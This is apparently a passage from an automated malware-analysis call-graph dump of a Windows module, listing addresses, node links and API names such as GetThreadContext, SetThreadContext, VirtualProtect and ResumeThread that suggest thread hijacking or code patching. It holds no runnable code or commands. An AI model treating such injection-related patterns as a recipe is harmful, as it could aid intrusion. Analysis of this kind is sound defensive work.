9042->9043 9043->9044 9044->9040 9044->9041 9044->9042 9048 26504ea4268 9045->9048 9046 26504ea42d7 9046->9028 9047 26504ea42bd VirtualQuery 9047->9046 9047->9048 9048->9046 9048->9047 9049 26504ea4322 GetLastError 9048->9049 9049->9046 9049->9048 9051 26504ea796b 9050->9051 9052 26504ea798f 9051->9052 9053 26504ea7981 SetLastError 9051->9053 9052->9015 9053->9052 8052 26504ea8672 8055 26504ea90c0 8052->8055 8054 26504ea869d 8056 26504ea9116 8055->8056 8057 26504ea90e1 8055->8057 8056->8054 8057->8056 8059 26504eac328 8057->8059 8060 26504eac33f 8059->8060 8061 26504eac335 8059->8061 8062 26504ead1f4 __std_exception_copy 13 API calls 8060->8062 8061->8060 8065 26504eac35a 8061->8065 8067 26504eac346 8062->8067 8063 26504ead04c _invalid_parameter_noinfo 38 API calls 8064 26504eac352 8063->8064 8064->8056 8065->8064 8066 26504ead1f4 __std_exception_copy 13 API calls 8065->8066 8066->8067 8067->8063 8590 26504ea27e8 8591 26504ea2867 8590->8591 8592 26504ea28c9 GetFileType 8591->8592 8604 26504ea2998 8591->8604 8593 26504ea28ed 8592->8593 8594 26504ea28d7 StrCpyW 8592->8594 8606 26504ea1ad4 GetFinalPathNameByHandleW 8593->8606 8596 26504ea28fc 8594->8596 8599 26504ea299d 8596->8599 8601 26504ea2906 8596->8601 8597 26504ea3f88 StrCmpNIW 8597->8599 8598 26504ea3f88 StrCmpNIW 8598->8601 8599->8597 8600 26504ea3708 4 API calls 8599->8600 8602 26504ea1dd4 2 API calls 8599->8602 8599->8604 8600->8599 8601->8598 8601->8604 8611 26504ea3708 StrCmpIW 8601->8611 8615 26504ea1dd4 8601->8615 8602->8599 8607 26504ea1b3d 8606->8607 8608 26504ea1afe StrCmpNIW 8606->8608 8607->8596 8608->8607 8609 26504ea1b18 lstrlenW 8608->8609 8609->8607 8610 26504ea1b2a StrCpyW 8609->8610 8610->8607 8612 26504ea3751 PathCombineW 8611->8612 8613 26504ea373a StrCpyW StrCatW 8611->8613 8614 26504ea375a 8612->8614 8613->8614 8614->8601 8616 26504ea1df4 8615->8616 8617 26504ea1deb 8615->8617 8616->8601 8618 26504ea1530 2 API calls 8617->8618 8618->8616 8619 26504eab7ea 8620 26504eac2f4 14 API calls 8619->8620 8621 26504eab7ef 8620->8621 8622 26504eab85f 8621->8622 8623 26504eab815 GetModuleHandleW 8621->8623 8636 26504eab6f8 8622->8636 8623->8622 8627 26504eab822 8623->8627 8627->8622 8631 26504eab904 GetModuleHandleExW 8627->8631 8632 26504eab938 GetProcAddress 8631->8632 8633 26504eab94a 8631->8633 8632->8633 8634 26504eab962 8633->8634 8635 26504eab95b FreeLibrary 8633->8635 8634->8622 8635->8634 8648 26504eac558 EnterCriticalSection 8636->8648 9054 26504eac180 9057 26504eabf38 9054->9057 9064 26504eabf00 9057->9064 9065 26504eabf10 9064->9065 9066 26504eabf15 9064->9066 9067 26504eabebc 13 API calls 9065->9067 9068 26504eabf1c 9066->9068 9067->9066 9069 26504eabf31 9068->9069 9070 26504eabf2c 9068->9070 9072 26504eabebc 9069->9072 9071 26504eabebc 13 API calls 9070->9071 9071->9069 9073 26504eabec1 9072->9073 9074 26504eabef2 9072->9074 9075 26504eabeea 9073->9075 9076 26504ead2a0 __free_lconv_mon 13 API calls 9073->9076 9077 26504ead2a0 __free_lconv_mon 13 API calls 9075->9077 9076->9073 9077->9074 8068 26504ea2c80 TlsGetValue TlsGetValue TlsGetValue 8069 26504ea2cd9 8068->8069 8072 26504ea2d51 8068->8072 8069->8072 8074 26504ea2ce1 8069->8074 8070 26504ea2d4c 8071 26504ea2e06 TlsSetValue TlsSetValue TlsSetValue 8071->8070 8072->8070 8072->8071 8075 26504ea3f88 StrCmpNIW 8072->8075 8073 26504ea3f88 StrCmpNIW 8073->8074 8074->8070 8074->8071 8074->8073 8075->8072 9276 26504ea2300 9277 26504ea2331 9276->9277 9278 26504ea2447 9277->9278 9284 26504ea2355 9277->9284 9285 26504ea2412 9277->9285 9279 26504ea24bb 9278->9279 9280 26504ea244c 9278->9280 9283 26504ea35c8 11 API calls 9279->9283 9279->9285 9293 26504ea35c8 GetProcessHeap HeapAlloc 9280->9293 9282 26504ea238d StrCmpNIW 9282->9284 9283->9285 9284->9282 9284->9285 9287 26504ea1d30 9284->9287 9288 26504ea1db4 9287->9288 9289 26504ea1d57 GetProcessHeap HeapAlloc 9287->9289 9288->9284 9289->9288 9290 26504ea1d92 9289->9290 9291 26504ea1cfc 2 API calls 9290->9291 9292 26504ea1d9a GetProcessHeap HeapFree 9291->9292 9292->9288 9298 26504ea361b 9293->9298 9294 26504ea36d9 GetProcessHeap HeapFree 9294->9285 9295 26504ea36d4 9295->9294 9296 26504ea3666 StrCmpNIW 9296->9298 9297 26504ea1d30 6 API calls 9297->9298 9298->9294 9298->9295 9298->9296 9298->9297 9299 26504eab500 9304 26504eac558 EnterCriticalSection 9299->9304 9305 26504eb46f5 9306 26504ea9324 _CallSETranslator 9 API calls 9305->9306 9307 26504eb470d 9306->9307 9308 26504ea9324 _CallSETranslator 9 API calls 9307->9308 9309 26504eb4728 9308->9309 9310 26504ea9324 _CallSETranslator 9 API calls 9309->9310 9311 26504eb473c 9310->9311 9312 26504ea9324 _CallSETranslator 9 API calls 9311->9312 9313 26504eb477e 9312->9313 8076 26504eb387c 8077 26504eb38b4 __GSHandlerCheckCommon 8076->8077 8078 26504eb38e0 8077->8078 8080 26504ea9a24 8077->8080 8081 26504ea9324 _CallSETranslator 9 API calls 8080->8081 8082 26504ea9a4e 8081->8082 8083 26504ea9324 _CallSETranslator 9 API calls 8082->8083 8084 26504ea9a5b 8083->8084 8085 26504ea9324 _CallSETranslator 9 API calls 8084->8085 8086 26504ea9a64 8085->8086 8086->8078 8649 26504eacbfc 8654 26504eaf3a0 8649->8654 8651 26504eacc05 8652 26504eacb10 __std_exception_copy 13 API calls 8651->8652 8653 26504eacc22 __vcrt_uninitialize_ptd 8651->8653 8652->8653 8655 26504eaf3b1 8654->8655 8656 26504eaf3b5 8654->8656 8655->8651 8656->8655 8657 26504eaef88 9 API calls 8656->8657 8657->8655 8658 26504ea41f9 8661 26504ea4146 8658->8661 8659 26504ea41b0 8660 26504ea4196 VirtualQuery 8660->8659 8660->8661 8661->8659 8661->8660 8662 26504ea41ca VirtualAlloc 8661->8662 8662->8659 8663 26504ea41fb GetLastError 8662->8663 8663->8661 8664 26504ea5ff9 8665 26504ea6000 VirtualProtect 8664->8665 8666 26504ea6029 GetLastError 8665->8666 8667 26504ea5f10 8665->8667 8666->8667 8668 26504eb19d0 8671 26504eae864 8668->8671 8672 26504eae8b6 8671->8672 8673 26504eae871 8671->8673 8677 26504eacacc 8673->8677 8675 26504eae8a0 8682 26504eae53c 8675->8682 8678 26504eacae8 FlsGetValue 8677->8678 8680 26504eacae4 8677->8680 8678->8680 8679 26504eacafe 8679->8675 8680->8679 8681 26504eac940 _invalid_parameter_noinfo 13 API calls 8680->8681 8681->8679 8705 26504eae7ac 8682->8705 8687 26504eae58e 8687->8672 8688 26504eac5d0 14 API calls 8689 26504eae59f 8688->8689 8690 26504eae5a7 8689->8690 8692 26504eae5b6 8689->8692 8691 26504ead2a0 __free_lconv_mon 13 API calls 8690->8691 8691->8687 8692->8692 8724 26504eae8e0 8692->8724 8695 26504eae6b2 8696 26504ead1f4 __std_exception_copy 13 API calls 8695->8696 8697 26504eae6b7 8696->8697 8701 26504ead2a0 __free_lconv_mon 13 API calls 8697->8701 8698 26504eae70d 8700 26504eae774 8698->8700 8735 26504eae05c 8698->8735 8699 26504eae6cc 8699->8698 8702 26504ead2a0 __free_lconv_mon 13 API calls 8699->8702 8704 26504ead2a0 __free_lconv_mon 13 API calls 8700->8704 8701->8687 8702->8698 8704->8687 8706 26504eae7cf 8705->8706 8713 26504eae7d9 8706->8713 8750 26504eac558 EnterCriticalSection 8706->8750 8712 26504eae571 8717 26504eae22c 8712->8717 8713->8712 8714 26504eacacc 14 API calls 8713->8714 8715 26504eae8a0 8714->8715 8716 26504eae53c 56 API calls 8715->8716 8716->8712 8718 26504eadd78 14 API calls 8717->8718 8719 26504eae240 8718->8719 8720 26504eae25e 8719->8720 8721 26504eae24c GetOEMCP 8719->8721 8722 26504eae273 8720->8722 8723 26504eae263 GetACP 8720->8723 8721->8722 8722->8687 8722->8688 8723->8722 8725 26504eae22c 16 API calls 8724->8725 8726 26504eae91b 8725->8726 8727 26504eaea71 8726->8727 8728 26504eae958 IsValidCodePage 8726->8728 8734 26504eae972 8726->8734 8729 26504ea8070 _invalid_parameter_noinfo 8 API calls 8727->8729 8728->8727 8730 26504eae969 8728->8730 8731 26504eae6a9 8729->8731 8732 26504eae998 GetCPInfo 8730->8732 8730->8734 8731->8695 8731->8699 8732->8727 8732->8734 8751 26504eae344 8734->8751 8824 26504eac558 EnterCriticalSection 8735->8824 8752 26504eae38f GetCPInfo 8751->8752 8761 26504eae485 8751->8761 8757 26504eae3a2 8752->8757 8752->8761 8753 26504ea8070 _invalid_parameter_noinfo 8 API calls 8754 26504eae524 8753->8754 8754->8727 8762 26504eb1474 8757->8762 8760 26504eb1938 33 API calls 8760->8761 8761->8753 8763 26504eadd78 14 API calls 8762->8763 8764 26504eb14b6 8763->8764 8765 26504eaec58 MultiByteToWideChar 8764->8765 8768 26504eb14ec 8765->8768 8766 26504eb14f3 8769 26504ea8070 _invalid_parameter_noinfo 8 API calls 8766->8769 8767 26504eb15b0 8767->8766 8772 26504ead2a0 __free_lconv_mon 13 API calls 8767->8772 8768->8766 8768->8767 8770 26504eac5d0 14 API calls 8768->8770 8773 26504eb151c 8768->8773 8771 26504eae419 8769->8771 8770->8773 8777 26504eb1938 8771->8777 8772->8766 8773->8767 8774 26504eaec58 MultiByteToWideChar 8773->8774 8775 26504eb1592 8774->8775 8775->8767 8776 26504eb1596 GetStringTypeW 8775->8776 8776->8767 8778 26504eadd78 14 API calls 8777->8778 8779 26504eb195d 8778->8779 8782 26504eb1604 8779->8782 8783 26504eb1645 8782->8783 8784 26504eaec58 MultiByteToWideChar 8783->8784 8787 26504eb168f 8784->8787 8785 26504eb190d 8786 26504ea8070 _invalid_parameter_noinfo 8 API calls 8785->8786 8788 26504eae44c 8786->8788 8787->8785 8789 26504eac5d0 14 API calls 8787->8789 8790 26504eb17c5 8787->8790 8792 26504eb16c7 8787->8792 8788->8760 8789->8792 8790->8785 8791 26504ead2a0 __free_lconv_mon 13 API calls 8790->8791 8791->8785 8792->8790 8793 26504eaec58 MultiByteToWideChar 8792->8793 8794 26504eb173a 8793->8794 8794->8790 8813 26504eaf218 8794->8813 8796 26504eb176d 8796->8790 8797 26504eb17d6 8796->8797 8798 26504eb1785 8796->8798 8799 26504eac5d0 14 API calls 8797->8799 8801 26504eb18a8 8797->8801 8803 26504eb17f4 8797->8803 8798->8790 8800 26504eaf218 10 API calls 8798->8800 8799->8803 8800->8790 8801->8790 8802 26504ead2a0 __free_lconv_mon 13 API calls 8801->8802 8802->8790 8803->8790 8804 26504eaf218 10 API calls 8803->8804 8805 26504eb1874 8804->8805 8805->8801 8806 26504eb1894 8805->8806 8807 26504eb18aa 8805->8807 8808 26504eaece8 WideCharToMultiByte 8806->8808 8809 26504eaece8 WideCharToMultiByte 8807->8809 8810 26504eb18a2 8808->8810 8809->8810 8810->8801 8811 26504eb18c2 8810->8811 8811->8790 8812 26504ead2a0 __free_lconv_mon 13 API calls 8811->8812 8812->8790 8814 26504eaf244 8813->8814 8815 26504eaf267 8813->8815 8817 26504eaf26f 8814->8817 8819 26504eaef88 9 API calls 8814->8819 8815->8817 8820 26504eaf30c 8815->8820 8817->8796 8818 26504eaf2cd LCMapStringW 8818->8817 8819->8815 8821 26504eaf328 8820->8821 8822 26504eaf34a 8820->8822 8821->8822 8823 26504eaef88 9 API calls 8821->8823 8822->8818 8823->8822 9078 26504eb494f 9079 26504eb495e 9078->9079 9080 26504eb4968 9078->9080 9082 26504eac5ac LeaveCriticalSection 9079->9082 9314 26504ea86d0 9315 26504ea90c0 __std_exception_copy 38 API calls 9314->9315 9316 26504ea86f9 9315->9316 8087 26504ea2e54 8089 26504ea2ea8 8087->8089 8088 26504ea2ec3 8089->8088 8091 26504ea37f4 8089->8091 8092 26504ea3819 8091->8092 8093 26504ea388a 8091->8093 8092->8093 8094 26504ea3f88 StrCmpNIW 8092->8094 8095 26504ea1e08 StrCmpIW StrCmpW 8092->8095 8093->8088 8094->8092 8095->8092 9317 26504eab0d4 9324 26504eab007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9317->9324 9318 26504eab0fb 9319 26504ea9324 _CallSETranslator 9 API calls 9318->9319 9320 26504eab100 9319->9320 9321 26504ea9324 _CallSETranslator 9 API calls 9320->9321 9322 26504eab10b __FrameHandler3::GetHandlerSearchState 9320->9322 9321->9322 9323 26504ea99cc 9 API calls Is_bad_exception_allowed 9323->9324 9324->9318 9324->9322 9324->9323 9325 26504ea99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9324->9325 9325->9324 8096 26504eb4848 8099 26504ea904c 8096->8099 8100 26504ea9064 8099->8100 8101 26504ea9076 8099->8101 8100->8101 8103 26504ea906c 8100->8103 8102 26504ea9324 _CallSETranslator 9 API calls 8101->8102 8104 26504ea907b 8102->8104 8105 26504ea9074 8103->8105 8106 26504ea9324 _CallSETranslator 9 API calls 8103->8106 8104->8105 8107 26504ea9324 _CallSETranslator 9 API calls 8104->8107 8108 26504ea909b 8106->8108 8107->8105 8109 26504ea9324 _CallSETranslator 9 API calls 8108->8109 8110 26504ea90a8 8109->8110 8111 26504eac2f4 14 API calls 8110->8111 8112 26504ea90b1 8111->8112 8113 26504eac2f4 14 API calls 8112->8113 8114 26504ea90bd 8113->8114 9083 26504eaad48 9084 26504ea9324 _CallSETranslator 9 API calls 9083->9084 9085 26504eaad7d 9084->9085 9086 26504ea9324 _CallSETranslator 9 API calls 9085->9086 9087 26504eaad8b __except_validate_context_record 9086->9087 9088 26504ea9324 _CallSETranslator 9 API calls 9087->9088 9089 26504eaadcf 9088->9089 9090 26504ea9324 _CallSETranslator 9 API calls 9089->9090 9091 26504eaadd8 9090->9091 9092 26504ea9324 _CallSETranslator 9 API calls 9091->9092 9093 26504eaade1 9092->9093 9106 26504ea993c 9093->9106 9096 26504ea9324 _CallSETranslator 9 API calls 9097 26504eaae11 __CxxCallCatchBlock 9096->9097 9098 26504ea9978 __CxxCallCatchBlock 9 API calls 9097->9098 9102 26504eaaec2 9098->9102 9099 26504eaaeeb __CxxCallCatchBlock 9100 26504ea9324 _CallSETranslator 9 API calls 9099->9100 9101 26504eaaefe 9100->9101 9103 26504ea9324 _CallSETranslator 9 API calls 9101->9103 9102->9099 9104 26504ea8ff8 __CxxCallCatchBlock 9 API calls 9102->9104 9105 26504eaaf07 9103->9105 9104->9099 9107 26504ea9324 _CallSETranslator 9 API calls 9106->9107 9108 26504ea994d 9107->9108 9109 26504ea9958 9108->9109 9110 26504ea9324 _CallSETranslator 9 API calls 9108->9110 9111 26504ea9324 _CallSETranslator 9 API calls 9109->9111 9110->9109 9112 26504ea9969 9111->9112 9112->9096 9112->9097 8115 26504ea824c 8116 26504ea8270 __scrt_acquire_startup_lock 8115->8116 8117 26504eab581 8116->8117 8118 26504eacb10 __std_exception_copy 13 API calls 8116->8118 8119 26504eab5aa 8118->8119 8825 26504ea5fcc 8826 26504ea5fd3 8825->8826 8827 26504ea6000 VirtualProtect 8826->8827 8828 26504ea5f10 8826->8828 8827->8828 8829 26504ea6029 GetLastError 8827->8829 8829->8828 9113 26504eb3960 9123 26504ea8ca0 9113->9123 9115 26504eb3988 9117 26504ea9324 _CallSETranslator 9 API calls 9118 26504eb3998 9117->9118 9119 26504ea9324 _CallSETranslator 9 API calls 9118->9119 9120 26504eb39a1 9119->9120 9121 26504eac2f4 14 API calls 9120->9121 9122 26504eb39aa 9121->9122 9126 26504ea8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9123->9126 9124 26504ea8dd1 9124->9115 9124->9117 9125 26504ea8d94 RtlUnwindEx 9125->9126 9126->9124 9126->9125 9326 26504eb06e0 9327 26504eb06f9 9326->9327 9328 26504eb06e9 9326->9328 9329 26504ead1f4 __std_exception_copy 13 API calls 9328->9329 9330 26504eb06ee 9329->9330 9331 26504ead04c _invalid_parameter_noinfo 38 API calls 9330->9331 9331->9327 8120 26504eb465f 8121 26504eb46e2 8120->8121 8122 26504eb4677 8120->8122 8122->8121 8123 26504ea9324 _CallSETranslator 9 API calls 8122->8123 8124 26504eb46c4 8123->8124 8125 26504ea9324 _CallSETranslator 9 API calls 8124->8125 8126 26504eb46d9 8125->8126 8127 26504eac2f4 14 API calls 8126->8127 8127->8121 9127 26504ea7f60 9128 26504ea7f81 9127->9128 9129 26504ea7f7c 9127->9129 9131 26504ea8090 9129->9131 9132 26504ea80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9131->9132 9133 26504ea8127 9131->9133 9132->9133 9133->9128 8128 26504eb485e 8129 26504ea9324 _CallSETranslator 9 API calls 8128->8129 8130 26504eb486c 8129->8130 8131 26504ea9324 _CallSETranslator 9 API calls 8130->8131 8132 26504eb4877 8130->8132 8131->8132 8830 26504ea63e3 8831 26504ea63f0 8830->8831 8832 26504ea63fc GetThreadContext 8831->8832 8837 26504ea655a 8831->8837 8833 26504ea6422 8832->8833 8832->8837 8833->8837 8839 26504ea6449 8833->8839 8834 26504ea663e 8836 26504ea665e 8834->8836 8840 26504ea4b20 VirtualFree 8834->8840 8835 26504ea6581 VirtualProtect FlushInstructionCache 8835->8837 8838 26504ea5530 3 API calls 8836->8838 8837->8834 8837->8835 8845 26504ea6663 8838->8845 8841 26504ea64cd 8839->8841 8842 26504ea64a6 SetThreadContext 8839->8842 8840->8836 8842->8841 8843 26504ea66b7 8846 26504ea8070 _invalid_parameter_noinfo 8 API calls 8843->8846 8844 26504ea6677 ResumeThread 8844->8845 8845->8843 8845->8844 8847 26504ea66ff 8846->8847 8848 26504eaf3e4 8849 26504eaf41d 8848->8849 8850 26504eaf3ee 8848->8850 8850->8849 8851 26504eaf403 FreeLibrary 8850->8851 8851->8850 8852 26504eb33e4 8853 26504eb33f5 CloseHandle 8852->8853 8854 26504eb33fb 8852->8854 8853->8854 8133 26504ead658 8134 26504ead67d 8133->8134 8138 26504ead694 8133->8138 8135 26504ead1f4 __std_exception_copy 13 API calls 8134->8135 8136 26504ead682 8135->8136 8139 26504ead04c _invalid_parameter_noinfo 38 API calls 8136->8139 8137 26504ead724 8265 26504eabb54 8137->8265 8138->8137 8147 26504ead7b6 8138->8147 8157 26504ead6da 8138->8157 8166 26504ead894 8138->8166 8228 26504eada18 8138->8228 8162 26504ead68d 8139->8162 8143 26504ead784 8146 26504ead2a0 __free_lconv_mon 13 API calls 8143->8146 8145 26504ead836 8148 26504ead2a0 __free_lconv_mon 13 API calls 8145->8148 8159 26504ead78b 8146->8159 8151 26504ead2a0 __free_lconv_mon 13 API calls 8147->8151 8161 26504ead6fd 8147->8161 8160 26504ead841 8148->8160 8149 26504ead7d7 8149->8145 8149->8149 8163 26504ead87c 8149->8163 8271 26504eb0eb8 8149->8271 8150 26504ead85a 8156 26504ead2a0 __free_lconv_mon 13 API calls 8150->8156 8151->8147 8152 26504ead2a0 __free_lconv_mon 13 API calls 8152->8157 8153 26504ead2a0 __free_lconv_mon 13 API calls 8153->8159 8154 26504ead2a0 __free_lconv_mon 13 API calls 8154->8162 8155 26504ead2a0 __free_lconv_mon 13 API calls 8155->8160 8156->8162 8157->8152 8157->8161 8159->8153 8159->8161 8160->8150 8160->8155 8161->8154 8164 26504ead06c _invalid_parameter_noinfo 17 API calls 8163->8164 8165 26504ead891 8164->8165 8167 26504ead8c2 8166->8167 8167->8167 8168 26504ead8de 8167->8168 8169 26504ead220 _invalid_parameter_noinfo 13 API calls 8167->8169 8168->8138 8170 26504ead90d 8169->8170 8171 26504ead926 8170->8171 8173 26504eb0eb8 38 API calls 8170->8173 8172 26504eb0eb8 38 API calls 8171->8172 8175 26504ead9fc 8171->8175 8174 26504ead943 8172->8174 8173->8171 8174->8175 8176 26504ead97f 8174->8176 8178 26504ead98d 8174->8178 8179 26504ead962 8174->8179 8177 26504ead06c _invalid_parameter_noinfo 17 API calls 8175->8177 8181 26504ead2a0 __free_lconv_mon 13 API calls 8176->8181 8187 26504eada17 8177->8187 8182 26504ead977 8178->8182 8280 26504eaeee0 8178->8280 8180 26504ead220 _invalid_parameter_noinfo 13 API calls 8179->8180 8185 26504ead96d 8180->8185 8181->8175 8182->8176 8183 26504ead2a0 __free_lconv_mon 13 API calls 8182->8183 8183->8176 8184 26504eada7a 8191 26504eada8c 8184->8191 8197 26504eadaa1 8184->8197 8188 26504ead2a0 __free_lconv_mon 13 API calls 8185->8188 8187->8184 8289 26504eb13d8 8187->8289 8188->8182 8189 26504ead9b5 8192 26504ead9d0 8189->8192 8193 26504ead9ba 8189->8193 8195 26504ead894 52 API calls 8191->8195 8194 26504ead2a0 __free_lconv_mon 13 API calls 8192->8194 8196 26504ead2a0 __free_lconv_mon 13 API calls 8193->8196 8194->8176 8198 26504eada9c 8195->8198 8196->8182 8298 26504eadd78 8197->8298 8200 26504ea8070 _invalid_parameter_noinfo 8 API calls 8198->8200 8202 26504eadd64 8200->8202 8202->8138 8204 26504eadb1a 8310 26504ead30c 8204->8310 8207 26504eadba8 8208 26504ead894 52 API calls 8207->8208 8209 26504eadbb8 8208->8209 8209->8198 8211 26504ead2a0 __free_lconv_mon 13 API calls 8209->8211 8210 26504eadd78 14 API calls 8215 26504eadbd2 8210->8215 8211->8198 8212 26504eaf198 9 API calls 8212->8215 8214 26504ead894 52 API calls 8214->8215 8215->8210 8215->8212 8215->8214 8216 26504eadcc8 FindNextFileW 8215->8216 8217 26504eadd2a 8215->8217 8219 26504ead2a0 13 API calls __free_lconv_mon 8215->8219 8332 26504ead4ac 8215->8332 8216->8215 8218 26504eadce0 8216->8218 8220 26504eadd38 FindClose 8217->8220 8222 26504ead2a0 __free_lconv_mon 13 API calls 8217->8222 8221 26504eadd0c FindClose 8218->8221 8354 26504eb0b20 8218->8354 8219->8215 8220->8198 8223 26504eadd48 8220->8223 8221->8198 8225 26504eadd1c 8221->8225 8222->8220 8227 26504ead2a0 __free_lconv_mon 13 API calls 8223->8227 8226 26504ead2a0 __free_lconv_mon 13 API calls 8225->8226 8226->8198 8227->8198 8229 26504eada58 8228->8229 8230 26504eada7a 8228->8230 8229->8230 8231 26504eb13d8 38 API calls 8229->8231 8232 26504eada8c 8230->8232 8234 26504eadaa1 8230->8234 8231->8229 8233 26504ead894 56 API calls 8232->8233 8247 26504eada9c 8233->8247 8235 26504eadd78 14 API calls 8234->8235 8238 26504eadb0b 8235->8238 8236 26504ea8070 _invalid_parameter_noinfo 8 API calls 8237 26504eadd64 8236->8237 8237->8138 8239 26504eadb1a 8238->8239 8240 26504eaf198 9 API calls 8238->8240 8241 26504ead30c 16 API calls 8239->8241 8240->8239 8242 26504eadb7b FindFirstFileExW 8241->8242 8243 26504eadba8 8242->8243 8252 26504eadbd2 8242->8252 8244 26504ead894 56 API calls 8243->8244 8245 26504eadbb8 8244->8245 8245->8247 8248 26504ead2a0 __free_lconv_mon 13 API calls 8245->8248 8246 26504eadd78 14 API calls 8246->8252 8247->8236 8248->8247 8249 26504eaf198 9 API calls 8249->8252 8250 26504ead4ac 16 API calls 8250->8252 8251 26504ead894 56 API calls 8251->8252 8252->8246 8252->8249 8252->8250 8252->8251 8253 26504eadcc8 FindNextFileW 8252->8253 8254 26504eadd2a 8252->8254 8256 26504ead2a0 13 API calls __free_lconv_mon 8252->8256 8253->8252 8255 26504eadce0 8253->8255 8257 26504eadd38 FindClose 8254->8257 8259 26504ead2a0 __free_lconv_mon 13 API calls 8254->8259 8258 26504eadd0c FindClose 8255->8258 8261 26504eb0b20 38 API calls 8255->8261 8256->8252 8257->8247 8260 26504eadd48 8257->8260 8258->8247 8262 26504eadd1c 8258->8262 8259->8257 8264 26504ead2a0 __free_lconv_mon 13 API calls 8260->8264 8261->8258 8263 26504ead2a0 __free_lconv_mon 13 API calls 8262->8263 8263->8247 8264->8247 8266 26504eabb6c 8265->8266 8267 26504eabba4 8265->8267 8266->8267 8268 26504ead220 _invalid_parameter_noinfo 13 API calls 8266->8268 8267->8143 8267->8149 8269 26504eabb9a 8268->8269 8270 26504ead2a0 __free_lconv_mon 13 API calls 8269->8270 8270->8267 8275 26504eb0ed5 8271->8275 8272 26504eb0eda 8273 26504eb0ef0 8272->8273 8274 26504ead1f4 __std_exception_copy 13 API calls 8272->8274 8273->8149 8276 26504eb0ee4 8274->8276 8275->8272 8275->8273 8278 26504eb0f24 8275->8278 8277 26504ead04c _invalid_parameter_noinfo 38 API calls 8276->8277 8277->8273 8278->8273 8279 26504ead1f4 __std_exception_copy 13 API calls 8278->8279 8279->8276 8281 26504eaef1f 8280->8281 8282 26504eaef02 8280->8282 8284 26504eaef29 8281->8284 8362 26504eb19f0 8281->8362 8282->8281 8283 26504eaef10 8282->8283 8285 26504ead1f4 __std_exception_copy 13 API calls 8283->8285 8369 26504eb1a40 8284->8369 8288 26504eaef15 8285->8288 8288->8189 8290 26504eb13e0 8289->8290 8291 26504eb13f5 8290->8291 8293 26504eb140e 8290->8293 8292 26504ead1f4 __std_exception_copy 13 API calls 8291->8292 8294 26504eb13fa 8292->8294 8296 26504eadd78 14 API calls 8293->8296 8297 26504eb1405 8293->8297 8295 26504ead04c _invalid_parameter_noinfo 38 API calls 8294->8295 8295->8297 8296->8297 8297->8187 8299 26504eadb0b 8298->8299 8300 26504eadd9c 8298->8300 8299->8204 8306 26504eaf198 8299->8306 8300->8299 8301 26504eacab0 _invalid_parameter_noinfo 14 API calls 8300->8301 8302 26504eaddb7 8301->8302 8388 26504eaffb4 8302->8388 8307 26504eaf1ca 8306->8307 8308 26504eaf1a9 8306->8308 8307->8204 8308->8307 8396 26504eaef88 8308->8396 8311 26504ead336 8310->8311 8312 26504ead35a 8310->8312 8313 26504ead345 FindFirstFileExW 8311->8313 8316 26504ead2a0 __free_lconv_mon 13 API calls 8311->8316 8314 26504ead3bf 8312->8314 8315 26504ead35f 8312->8315 8313->8207 8313->8215 8415 26504eaec58 8314->8415 8315->8313 8318 26504ead2a0 __free_lconv_mon 13 API calls 8315->8318 8323 26504ead374 8315->8323 8316->8313 8318->8323 8319 26504eac5d0 14 API calls 8319->8313 8323->8319 8333 26504ead4d6 8332->8333 8334 26504ead4fa 8332->8334 8335 26504ead4e5 8333->8335 8338 26504ead2a0 __free_lconv_mon 13 API calls 8333->8338 8336 26504ead500 8334->8336 8337 26504ead55f 8334->8337 8335->8215 8336->8335 8340 26504ead515 8336->8340 8343 26504ead2a0 __free_lconv_mon 13 API calls 8336->8343 8418 26504eaece8 8337->8418 8338->8335 8344 26504eac5d0 14 API calls 8340->8344 8343->8340 8344->8335 8355 26504eb0b52 8354->8355 8356 26504ead1f4 __std_exception_copy 13 API calls 8355->8356 8361 26504eb0b67 8355->8361 8357 26504eb0b5c 8356->8357 8358 26504ead04c _invalid_parameter_noinfo 38 API calls 8357->8358 8358->8361 8359 26504ea8070 _invalid_parameter_noinfo 8 API calls 8360 26504eb0ea8 8359->8360 8360->8221 8361->8359 8363 26504eb1a12 HeapSize 8362->8363 8364 26504eb19f9 8362->8364 8365 26504ead1f4 __std_exception_copy 13 API calls 8364->8365 8366 26504eb19fe 8365->8366 8367 26504ead04c _invalid_parameter_noinfo 38 API calls 8366->8367 8368 26504eb1a09 8367->8368 8368->8284 8370 26504eb1a5f 8369->8370 8371 26504eb1a55 8369->8371 8373 26504eb1a64 8370->8373 8379 26504eb1a6b _invalid_parameter_noinfo 8370->8379 8381 26504eac5d0 8371->8381 8374 26504ead2a0 __free_lconv_mon 13 API calls 8373->8374 8377 26504eb1a5d 8374->8377 8375 26504eb1a9e HeapReAlloc 8375->8377 8375->8379 8376 26504eb1a71 8378 26504ead1f4 __std_exception_copy 13 API calls 8376->8378 8377->8288 8378->8377 8379->8375 8379->8376 8380 26504eab470 _invalid_parameter_noinfo 2 API calls 8379->8380 8380->8379 8382 26504eac61b 8381->8382 8387 26504eac5df _invalid_parameter_noinfo 8381->8387 8384 26504ead1f4 __std_exception_copy 13 API calls 8382->8384 8383 26504eac602 HeapAlloc 8385 26504eac619 8383->8385 8383->8387 8384->8385 8385->8377 8386 26504eab470 _invalid_parameter_noinfo 2 API calls 8386->8387 8387->8382 8387->8383 8387->8386 8389 26504eaddda 8388->8389 8390 26504eaffc9 8388->8390 8392 26504eb0020 8389->8392 8390->8389 8391 26504eb0a40 _invalid_parameter_noinfo 14 API calls 8390->8391 8391->8389 8393 26504eb0035 8392->8393 8394 26504eb0048 8392->8394 8393->8394 8395 26504eae8c4 _invalid_parameter_noinfo 14 API calls 8393->8395 8394->8299 8395->8394 8397 26504eaf078 8396->8397 8406 26504eaefbd __vcrt_InitializeCriticalSectionEx 8396->8406 8414 26504eac558 EnterCriticalSection 8397->8414 8398 26504eaefe2 LoadLibraryExW 8402 26504eaf107 8398->8402 8403 26504eaf007 GetLastError 8398->8403 8401 26504eaf120 GetProcAddress 8401->8397 8402->8401 8407 26504eaf117 FreeLibrary 8402->8407 8403->8406 8406->8397 8406->8398 8406->8401 8412 26504eaf041 LoadLibraryExW 8406->8412 8407->8401 8412->8402 8412->8406 8416 26504eaec61 MultiByteToWideChar 8415->8416 8420 26504eaed0c WideCharToMultiByte 8418->8420 8855 26504eac1d8 8856 26504eac209 8855->8856 8857 26504eac1f1 8855->8857 8857->8856 8858 26504ead2a0 __free_lconv_mon 